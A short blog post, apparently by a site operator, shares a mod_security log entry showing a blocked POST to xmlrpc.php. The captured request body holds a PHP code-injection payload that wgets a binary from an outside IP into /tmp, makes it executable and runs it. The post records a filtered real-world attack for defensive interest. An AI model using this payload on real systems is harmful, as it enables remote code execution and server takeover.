These are being filtered by mod_security now, which makes it interesting to post:
HTTP/1.1 403 Forbidden
Content-Length: 212
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 24.16.48.220 – – [19/Dec/2005:05:52:37 –0800] “POST /blog/xmlrpc.php HTTP/1.1” 403 221
Handler: (null)
—————————————-
POST /blog/xmlrpc.php HTTP/1.1
Host: 216.66.19.135
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length: 269
mod_security-message: Access denied with code 403. Pattern match “!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)” at HEADER
mod_security-action: 403269
<?xml version=”1.0″?><methodCall><methodName>test.method</methodName><params><param><value><name>’,”));echo ‘_begin_’;echo `cd /tmp;wget 65.218.1.216/nikons;chmod +x nikons;./nikons `;echo ‘_end_’;exit;/*</name></value></param></params></methodCall>